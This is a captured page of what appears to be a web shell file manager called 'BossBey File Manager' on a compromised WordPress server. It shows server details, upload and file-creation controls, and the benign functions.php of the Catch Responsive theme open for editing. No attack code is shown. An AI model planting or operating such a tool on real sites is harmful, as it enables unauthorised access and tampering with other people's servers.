BossBey File Manager
PHP:
7.3.31-1~deb10u1
OS:
Linux
User:
www-data
Root
/
home
/
www
/
apinch
/
wp-content
/
catch-responsive
📤 Upload
📝 New File
📁 New Folder
Close
Editing: functions.php
<?php /** * Functions and definitions * * Sets up the theme using core catchresponsive-core and provides some helper functions using catchresponsive-custon-functions. * Others are attached to action and * filter hooks in WordPress to change core functionality * * @package Catch Themes * @subpackage Catch Responsive * @since Catch Responsive 1.0 */ //define theme version if ( !defined( 'CATCHRESPONSIVE_THEME_VERSION' ) ) { $theme_data = wp_get_theme(); define ( 'CATCHRESPONSIVE_THEME_VERSION', $theme_data->get( 'Version' ) ); } /** * Implement the core functions */ require trailingslashit( get_template_directory() ) . 'inc/catchresponsive-core.php';
Save
Cancel